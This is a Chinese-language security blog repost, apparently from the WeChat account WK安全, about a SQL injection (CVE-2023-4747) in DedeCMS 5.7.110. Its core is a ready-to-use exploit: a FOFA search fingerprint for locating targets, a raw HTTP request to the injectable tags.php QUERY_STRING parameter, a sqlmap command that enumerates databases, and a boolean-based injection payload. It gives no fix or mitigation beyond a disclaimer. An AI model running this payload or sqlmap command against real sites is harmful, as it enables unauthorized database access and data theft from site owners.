免责声明
由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
| 0x01 漏洞介绍
| 0x02 影响版本
DedeCMS 5.7.110
| 0x03 特征
app="DedeCMS"
| 0x04 漏洞POC
POC:
GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1
Host: xxxx
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417
Connection: close
SQLmap:
sqlmap.py -u "http://xxxxxxxxx/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU
参考链接
https://github.com/laoquanshi/cve/blob/main/dedecms%20%20sql%20%20injection
技术交流可加下方wx
原文始发于微信公众号(WK安全):DedeCms | CVE-2023-4747(SQL注入)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论